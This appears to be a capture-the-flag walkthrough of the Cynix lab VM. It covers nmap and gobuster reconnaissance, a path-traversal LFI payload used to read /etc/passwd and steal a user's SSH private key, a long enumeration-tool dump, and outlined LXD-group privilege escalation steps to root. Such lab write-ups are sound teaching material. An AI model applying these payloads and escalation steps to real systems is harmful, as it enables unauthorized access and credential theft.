Cynix is a Boot2Root machine. The machine is VirtualBox compatible but can be used in VMWare as well (not tested but it should work). The DHCP will assign an IP automatically. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
Vulnerable Machine Name: Cynix
Vulnerable Machine VM: VirtualBox
Vulnerable Machine Network: 192.168.56.101
Attacker Machine: Kali Linux 2019.4 (Running on vmwar
Vulnerable Machine VM: VMWare
Vulnerable Machine Network: 192.168.56.102
3. Host Discovery
We begin by trying to locate the IP address of our target. To do this we use nmap with the following command: nmap -sn 192.168.56.0/24
# Command breaks down as follows
-sn # This option tells Nmap not to do a port scan after host discovery, and only print out the available hosts that responded to the host discovery probes. This is often known as a “ping scan”
192.168.56.0/24 # IP range
As can be seen from Figure 3, our target is going to be either 192.168.56.100 or 192.168.56.101Having identified our potential targets, we will do a full TCP port scan to identify any open ports and services running using the following command nmap -sS -A -T4 -p- 192.168.56.100-101
# Command breaks down as follows
-sS # runs stealth syn scan
-A # OS and version detection + traceroute and scripts
-T4 # T4 timing
192.168.56.100-101 # IP range
As can be seen from Figure 4, there is nothing running on 192.168.56.100 therefore our Cynix box more than likely has IP 192.168.56.101 with services running on port 80 and 6688.
4. Service Enumeration
As seen in Figure 4, our host is running an Apache webserver on port 80 and an ssh server on port 6688.
As can be seen from Figure 5, after browsing to the 192.168.56.101 we are met with an Apache2 default page. Next we continue this with a directory brute force attack using the following command:
gobuster dir -u http://192.168.56.101/ -w /usr/share/dirbuster/wordlists/directories.jbrofuzz
NOTE: Multiple dictionaries were used before finding one containing a valid directory
Browsing to the lavalamp directory we are met with a web page as shown in Figure 7. After doing a bit of digging and reviewing intercepted requests and responses we see that the contact form makes a post request to another page - Figure 8, Figure 9.
Reviewing the response to that same request we notice a hidden form with opacity 0:0 inside the web page.
This provides no additional security and is more of a nuisance than anything else. Using burp we can create a quick rule to replace any response body containing opacity: 0:0; with opacity: 1:0;
Filling out the contact form again we notice that this time the form is visible as opposed to hidden.
After we enter an integer and click the download button we are redirected to a new web page - Figure 13.
Next we provide some sample text to both boxes and review the request and response to gain a better idea of what is happening in the background:
As can be seen from Figure 14, the application posts two variables - file and read to the server.
5. Local File Inclusion
As can be seen fro Figure 14, the file parameter could indicate the presence of a local file inclusion vulnerability. To test this theory we will replace the original parameter of “file=1 with ““file=../../../etc/passwd” and check our response.
Reviewing the response we see a message informing us that we are not allowed to do that. Indicating that we are on to something we again replace the original parameter of “file=1 with ““file=1../../../etc/passwd” and check our response.
Success! We have successfully found a Local File Inclusion vulnerability. As can be seen from Figure 15 there is a user called ford on the system. Remembering that there was also an ssh service running on the system we decide to check his ssh folder for any private keys.
As can be seen from Figure 16 we have successfully retrieved the private ssh key belonging to Ford
6. Getting Low Priv Shell
Our next step is to attempt to login to the system using that ssh key. First we copy the ssh key into a file - Figure 17
Next we change the file permissions by executing chmod 600 key.
Finally we attempt to login to the system using that key by executing the following command: ssh -i key ford@192.168.56.101 -p 6688
As can be seen from Figure 19 we have successfully obtained a low privilege shell to the system and captured the user.txt flag
7. More Enumeration
Next we run python -m SimpleHTTPserver from out attacking machine in order to be able to download the linux-smart-enumeration tool via ssh.
Next we make the file executable by issuing the command chmod +x lse.sh ,run it and we get the following output:
ford@blume:~$ ./lse.sh -l 1
---
If you know the current user password, write it here for better results:
---
LSE Version: 1.16
User: ford
User ID: 1000
Password: none
Home: /home/ford
Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
umask: 0022
Hostname: blume
Linux: 4.15.0-66-generic
Distribution: Ubuntu 18.04.3 LTS
Architecture: x86_64
==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in an administrative groups?.............. nope
[*] usr030 Other users with shell.......................................... yes!
---
root:x:0:0:root:/root:/bin/bash
ford:x:1000:1000:ford,,,:/home/ford:/bin/bash
---
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip
[i] usr060 Other users..................................................... skip
[*] usr070 PATH variables defined inside /etc.............................. yes!
---
/bin
/sbin
/usr/bin
/usr/games
/usr/local/bin
/usr/local/games
/usr/local/sbin
/usr/sbin
---
[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?.................................
nope
[!] sud010 Can we list sudo commands without a password?................... nope
[*] sud040 Can we read /etc/sudoers?....................................... nope
[*] sud050 Do we know if any other users used sudo?........................ yes!
---
ford
---
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
---
/var/lib/lxd/devlxd/sock
/var/lib/lxd/unix.socket
/var/lib/lxcfs/proc
/var/lib/lxcfs/cgroup
/var/lib/php/sessions
/var/www/html/lavalamp/css/bootstrap.css
/var/www/html/lavalamp/css/isotope.css
/var/www/html/lavalamp/css/flexslider.css
/var/www/html/lavalamp/css/animate.css
/var/www/html/lavalamp/css/overwrite.css
/var/www/html/lavalamp/css/style.css
/var/www/html/lavalamp/css/font-awesome.css
/var/www/html/lavalamp/css/icon-component.css
/var/www/html/lavalamp/js/jquery.isotope.min.js
/var/www/html/lavalamp/js/stellar.js
/var/www/html/lavalamp/js/jquery.flexslider-min.js
/var/www/html/lavalamp/js/fancybox/fancybox_sprite_402x.png
/var/www/html/lavalamp/js/fancybox/fancybox_overlay.png
/var/www/html/lavalamp/js/fancybox/fancybox_loading.gif
/var/www/html/lavalamp/js/fancybox/Descr.WD3
/var/www/html/lavalamp/js/fancybox/blank.gif
/var/www/html/lavalamp/js/fancybox/jquery.fancybox.css
/var/www/html/lavalamp/js/fancybox/fancybox_sprite.png
/var/www/html/lavalamp/js/fancybox/jquery.fancybox.pack.js
/var/www/html/lavalamp/js/fancybox/fancybox_loading_402x.gif
/var/www/html/lavalamp/js/jquery.scrollTo.min.js
/var/www/html/lavalamp/js/modernizr-2.6.2-respond-1.1.0.min.js
/var/www/html/lavalamp/js/skrollr.min.js
/var/www/html/lavalamp/js/jquery.js
/var/www/html/lavalamp/js/jquery.easing.1.3.js
/var/www/html/lavalamp/js/jquery.nicescroll.min.js
/var/www/html/lavalamp/js/jquery.appear.js
/var/www/html/lavalamp/js/jquery.scrollTo-1.4.3.1-min.js
/var/www/html/lavalamp/js/jquery.localScroll.min.js
/var/www/html/lavalamp/js/main.js
/var/www/html/lavalamp/js/bootstrap.min.js
/var/www/html/lavalamp/contactform/contactform.js
/var/www/html/lavalamp/contactform/Readme.txt
/var/www/html/lavalamp/index.html
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.eot@
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.woff
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.eot
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.svg
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.ttf
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.ttf
/var/www/html/lavalamp/fonts/fontawesome/fontawesome-webfont.svg
/var/www/html/lavalamp/fonts/fontawesome/fontawesome-webfont.ttf
/var/www/html/lavalamp/fonts/fontawesome/fontawesome-webfont.eot
/var/www/html/lavalamp/fonts/fontawesome/FontAwesome.otf
/var/www/html/lavalamp/fonts/fontawesome/fontawesome-webfont.woff
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.eot
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.woff
/var/www/html/lavalamp/fonts/codropsicons/codropsicons.svg
/var/www/html/lavalamp/fonts/codropsicons/codropsicons.woff
/var/www/html/lavalamp/fonts/codropsicons/codropsicons.eot
/var/www/html/lavalamp/fonts/codropsicons/codropsicons.ttf
/var/www/html/lavalamp/fonts/codropsicons/license.txt
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.svg
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.svg
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.ttf
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.woff
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.eot
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.dev.svg
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.eot@
/var/www/html/lavalamp/skin/default.css
/var/www/html/lavalamp/img/arrow_small_left.png
/var/www/html/lavalamp/img/logo.png
/var/www/html/lavalamp/img/parallax/img3.jpg
/var/www/html/lavalamp/img/parallax/img1.jpg
/var/www/html/lavalamp/img/team/member1.jpg
/var/www/html/lavalamp/img/team/member3.jpg
/var/www/html/lavalamp/img/team/member4.jpg
/var/www/html/lavalamp/img/team/member2.jpg
/var/www/html/lavalamp/img/testimonial/testimonial2.png
/var/www/html/lavalamp/img/testimonial/testimonial1.png
/var/www/html/lavalamp/img/testimonial/testimonial3.png
/var/www/html/lavalamp/img/clients/logo5.png
/var/www/html/lavalamp/img/clients/logo2.png
/var/www/html/lavalamp/img/clients/logo4.png
/var/www/html/lavalamp/img/clients/logo1.png
/var/www/html/lavalamp/img/clients/logo6.png
/var/www/html/lavalamp/img/clients/logo3.png
/var/www/html/lavalamp/img/arrow_small_right.png
/var/www/html/lavalamp/img/arrow_large_right.png
/var/www/html/lavalamp/img/arrow_large_left.png
/var/www/html/lavalamp/img/intro-background.jpg
/var/www/html/lavalamp/img/bullets-new.png
/var/www/html/lavalamp/Readme.txt
/var/tmp
/tmp
/tmp/.font-unix
/tmp/.X11-unix
/tmp/.Test-unix
/tmp/.XIM-unix
/tmp/suid.c
/tmp/.ICE-unix
---
[*] fst010 Binaries with setuid bit........................................ yes!
---
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/bin/ping
/bin/su
/bin/mount
/bin/umount
/bin/fusermount
---
[!] fst020 Uncommon setuid binaries........................................ nope
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... nope
[*] fst090 SSH files in home directories................................... yes!
---
-rw-r--r-- 1 ford ford 392 Nov 8 15:22 /home/ford/.ssh/id_rsa.pub
-rw-r--r-- 1 ford ford 1675 Nov 8 15:22 /home/ford/.ssh/id_rsa
-rw-r--r-- 1 ford ford 392 Nov 8 15:22 /home/ford/.ssh/authorized_keys
---
[*] fst100 Useful binaries................................................. yes!
---
/usr/bin/dig
/bin/nc.openbsd
/bin/nc
/bin/netcat
/usr/bin/wget
---
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'ford' have mail?.......................................... nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[!] fst160 Can we write to critical files?................................. nope
[!] fst170 Can we write to critical directories?........................... nope
[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope
[i] fst500 Files owned by user 'ford'...................................... skip
[i] fst510 SSH files anywhere.............................................. skip
[i] fst520 Check hosts.equiv file and its contents......................... skip
[i] fst530 List NFS server shares.......................................... skip
[i] fst540 Dump fstab file................................................. skip
=================================================================( system )=====
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip
[!] sys020 Does the /etc/passwd have hashes?............................... nope
[!] sys030 Can we read /etc/shadow file?................................... nope
[!] sys030 Can we read /etc/shadow- file?.................................. nope
[!] sys030 Can we read /etc/shadow~ file?.................................. nope
[!] sys030 Can we read /etc/master.passwd file?............................ nope
[*] sys040 Check for other superuser accounts.............................. nope
[*] sys050 Can root user log in via SSH?................................... nope
[i] sys060 List available shells........................................... skip
[i] sys070 System umask in /etc/login.defs................................. skip
[i] sys080 System password policies in /etc/login.defs..................... skip
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... yes!
---
/usr/bin/mtr-packet = cap_net_raw+ep
---
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
---
/etc/crontab:SHELL=/bin/sh
/etc/crontab:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/crontab:17 * * * * root cd / && run-parts --report /etc/cron.hourly
/etc/crontab:25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
/etc/crontab:47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
/etc/crontab:52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/etc/cron.d/popularity-contest:SHELL=/bin/sh
/etc/cron.d/popularity-contest:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/cron.d/popularity-contest:23 13 * * * root test -x /etc/cron.daily/popularity-contest && /etc/cron.daily/popularity-contest --crond
/etc/cron.d/php:09,39 * * * * root [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi
/etc/cron.d/zfsutils-linux:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/cron.d/zfsutils-linux:24 0 8-14 * * root [ $(date +\%w) -eq 0 ] && [ -x /usr/lib/zfs-linux/scrub ] && /usr/lib/zfs-linux/scrub
---
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[*] ret050 Can we write to any paths present in cron jobs.................. yes!
---
/dev/null
/dev/urandom
---
[!] ret060 Can we write to executable paths present in cron jobs........... nope
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====
[*] net000 Services listening only on localhost............................ nope
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip
[i] net520 ARP table....................................................... skip
[i] net530 Namerservers.................................................... skip
[i] net540 Systemd Nameservers............................................. skip
[i] net550 Listening TCP................................................... skip
[i] net560 Listening UDP................................................... skip
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. nope
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip
[i] srv410 Contents of /etc/xinetd.conf.................................... skip
[i] srv420 List /etc/xinetd.d if used...................................... skip
[i] srv430 List /etc/init.d/ permissions................................... skip
[i] srv440 List /etc/rc.d/init.d permissions............................... skip
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip
[i] srv460 List /etc/init/ permissions..................................... skip
[!] srv500 Can we write in systemd service files?.......................... nope
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip
==============================================================( processes )=====
[!] pro000 Can we write in any process binary?............................. nope
[*] pro010 Processes running with root permissions......................... yes!
---
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Feb12 ? 00:00:01 /sbin/init splash
root 222 1 0 Feb12 ? 00:00:00 /lib/systemd/systemd-journald
root 236 1 0 Feb12 ? 00:00:00 /lib/systemd/systemd-udevd
root 511 1 0 Feb12 ? 00:00:00 /lib/systemd/systemd-logind
root 512 1 0 Feb12 ? 00:00:04 /usr/bin/lxcfs /var/lib/lxcfs/
root 515 1 0 Feb12 ? 00:00:00 /usr/sbin/zed -F
root 516 1 0 Feb12 ? 00:00:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 528 1 0 Feb12 ? 00:00:00 /usr/sbin/cron -f
root 563 1 0 Feb12 ? 00:00:00 /usr/lib/accountsservice/accounts-daemon
root 565 1 0 Feb12 ? 00:00:00 /usr/sbin/sshd -D
root 609 1 0 Feb12 tty1 00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 698 1 0 Feb12 ? 00:00:00 /usr/sbin/apache2 -k start
root 749 1 0 Feb12 ? 00:00:01 /usr/lib/lxd/lxd --group lxd --logfile=/var/log/lxd/lxd.log
---
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
---
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
reqtimeout_module (shared)
setenvif_module (shared)
status_module (shared)
---
[!] sof040 Found any .htpasswd files?...................................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip
[i] sof520 Postgres version................................................ skip
[i] sof530 Apache version.................................................. skip
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... yes!
---
ford cdrom dip plugdev lpadmin sambashare lxd
---
==================================( FINISHED )==================================
The piece that we are particularly focused on is the user groups, specifically the lxd group
8. LXD Privilege Escalation
LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user - hence we can abuse this to escalate our privileges.
In order to successfully carry out this attack we need to perform the following steps:
Steps to be performed on the attacker machine:
Download build-alpine in your local machine through the git repository.
Execute the script “build -alpine” that will build the latest Alpine image as a compressed file, this step must be executed by the root user.
Transfer the tar file to the host machine
Steps to be performed on the victim machine:
Download the alpine image
Import image for lxd
Initialize the image inside a new container.
Mount the container inside the /root directory
8.1 Steps to be performed on the attacker machine:
Our first step is download and build an Alpine image - Figure 23
Next we need to transfer it to the victim machine - Figure 24.
8.2 Steps to be performed on the victim machine:
Our first step is download the tar file from the attacker pc - Figure 25.
Next we import the image for lxd - Figure 26.
Next we initialise the image inside a new container - Figure 27.
Next we mount the container inside the root directory - Figure 28.
Our final step is to start the new profile and execute a shell - Figure 29.
9. Capturing Root.txt
Having successfully gained a root shell we should now be able to retrieve the root.txt flag: